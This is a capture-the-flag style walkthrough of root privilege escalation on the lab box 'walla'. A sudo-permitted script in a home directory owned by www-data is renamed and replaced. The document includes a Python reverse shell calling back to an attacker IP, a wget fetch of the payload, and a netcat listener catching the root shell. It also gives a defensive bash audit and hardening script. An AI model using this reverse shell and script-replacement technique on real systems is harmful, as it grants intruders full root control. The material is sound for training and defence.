Misconfigured Home Directory Ownership and Sudo Permissions


The privilege-escalation vulnerability comes from two facts taken together: the www-data user is allowed, through sudo, to run one specific Python script in the walter user's home directory as root, and that home directory is owned not by walter but by www-data, the account we already control.

Owning the directory gives www-data full control over its contents: it can create, rename and delete entries regardless of who owns the individual files. It could, for example, plant SSH material in a .ssh directory under /home/walter and log in as walter over SSH, impersonating that user.

The more direct path, though, is the sudo rule itself. wifi_reset.py is owned by root, but replacing it does not require write access to the file: write permission on the parent directory is enough to rename the original out of the way and drop a new file with the same name. Running the sudo rule then executes the attacker's script as root, which hands over full control of the system.
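As an added example (not part of the original writeup), the following shell script encodes this check for the target of a sudo rule: it walks from the script up through its parent directories and reports the first component the current user could write or rename, treating a sticky directory owned by someone else as safe. The `audit_sudo_rules` helper that parses `sudo -l` output, the hypothetical `harden_walla_home` remediation and the temporary paths are my own assumptions, not commands taken from the box.

```bash
#!/usr/bin/env bash
# Added example, not code from the original writeup.
# Audit helper for the walla-style misconfiguration: a sudo rule that points
# at a script whose file OR any parent directory is writable by the caller.
# On walla the file was root-owned, but /home/walter belonged to www-data,
# so the file could be renamed and replaced without ever writing to it.

# first_writable_component PATH
# Walks from PATH up towards / and prints the first component the current
# user can write to; returns 1 if nothing on the way is writable.
first_writable_component() {
    local p="$1" child=""
    while [ -n "$p" ] && [ "$p" != "/" ]; do
        if [ -w "$p" ]; then
            # Sticky dir (e.g. /tmp): entries may only be renamed/unlinked by
            # their owner or the directory owner, so a writable sticky dir
            # only helps if we own it or the entry we need to replace.
            if [ -d "$p" ] && [ -k "$p" ] && ! [ -O "$p" ] && ! [ -O "$child" ]; then
                :
            else
                printf '%s\n' "$p"
                return 0
            fi
        fi
        child="$p"
        p=$(dirname "$p")
    done
    return 1
}

# check_sudo_target PATH
# One-line verdict for the script a sudo rule executes. Exit 0 = replaceable.
check_sudo_target() {
    local target="$1" hit
    if hit=$(first_writable_component "$target"); then
        printf 'REPLACEABLE %s (writable component: %s)\n' "$target" "$hit"
        return 0
    fi
    printf 'OK %s\n' "$target"
    return 1
}

# audit_sudo_rules
# Pulls every absolute path out of the rules 'sudo -l' lists for the current
# user (lines such as "    (root) NOPASSWD: /usr/bin/python /home/walter/wifi_reset.py")
# and checks each one, so both the interpreter and the script get looked at.
audit_sudo_rules() {
    sudo -n -l 2>/dev/null |
        awk '/^[ \t]+\(/ { for (i = 1; i <= NF; i++) if ($i ~ /^\//) print $i }' |
        sort -u |
        while read -r path; do check_sudo_target "$path"; done
}

# harden_walla_home (hypothetical remediation; needs root and is not run here)
# Give walter the home directory back and lock it down. Better still, move the
# script out of any user-owned tree and point the sudoers rule at that copy.
harden_walla_home() {
    chown -R walter:walter /home/walter
    chmod 750 /home/walter
    chown root:root /home/walter/wifi_reset.py
    chmod 755 /home/walter/wifi_reset.py
}

case "${1:-}" in
    "")      ;;                        # no argument: only define the functions
    --audit) audit_sudo_rules ;;       # enumerate and check every sudo rule
    *)       check_sudo_target "$1" ;; # check one explicit path
esac
```

Run it as `./sudo_audit.sh --audit` on the target, or pass one path such as `/home/walter/wifi_reset.py`; a `REPLACEABLE` line names the directory (or file) that makes the rule exploitable. Note that the interpreter path in the rule deserves the same check as the script: a writable `/usr/bin/python` would be just as bad.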

www-data@walla:/$ mv /home/walter/wifi_reset.py /home/walter/wifi_reset.py.bak
www-data@walla:/$ ll /home/walter
total 28K
4.0K drwxr-xr-x 2 www-data www-data 4.0K Mar 27 13:04 .
4.0K -rw------- 1 www-data walter     33 Mar 27 12:55 local.txt
4.0K drwxr-xr-x 6 root     root     4.0K Sep 17  2020 ..
4.0K -rw-r--r-- 1 root     root      251 Sep 17  2020 wifi_reset.py.bak
4.0K -rw-r--r-- 1 walter   walter    220 Apr 18  2019 .bash_logout
4.0K -rw-r--r-- 1 walter   walter   3.5K Apr 18  2019 .bashrc
4.0K -rw-r--r-- 1 walter   walter    807 Apr 18  2019 .profile

First, I rename the original wifi_reset.py out of the way. The file itself is owned by root, but a rename only needs write access to the parent directory, which www-data has as the owner of /home/walter.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/walla]
└─$ cat wifi_reset.py
#!/usr/bin/env python3

import os,pty,socket,subprocess

# Connect back to the netcat listener on the Kali machine
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.45.218",1234))
# Point stdin, stdout and stderr of this process at the socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# Spawn bash on a pty so the remote shell is fully interactive
pty.spawn("bash")

The replacement wifi_reset.py, staged on the Kali machine, is a Python reverse shell that connects back to 192.168.45.218 on port 1234 and spawns bash on a pty.

www-data@walla:/$ wget -q http://192.168.45.218/wifi_reset.py -O /home/walter/wifi_reset.py

Delivery: the replacement is fetched over HTTP from the Kali machine straight into the path the sudo rule references.

www-data@walla:/$ sudo -u root /usr/bin/python /home/walter/wifi_reset.py

Executing the sudo-permitted command. sudo runs the replaced script as root, so the reverse shell it spawns runs with root's privileges; the listener on Kali must already be waiting.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/walla]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.179.97] 48366
root@walla:/# whoami
whoami
root
root@walla:/# hostname
hostname
walla
root@walla:/# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:a0:23 brd ff:ff:ff:ff:ff:ff
    inet 192.168.179.97/24 brd 192.168.179.255 scope global ens192
       valid_lft forever preferred_lft forever

System-level compromise: the callback arrives as root on walla (192.168.179.97).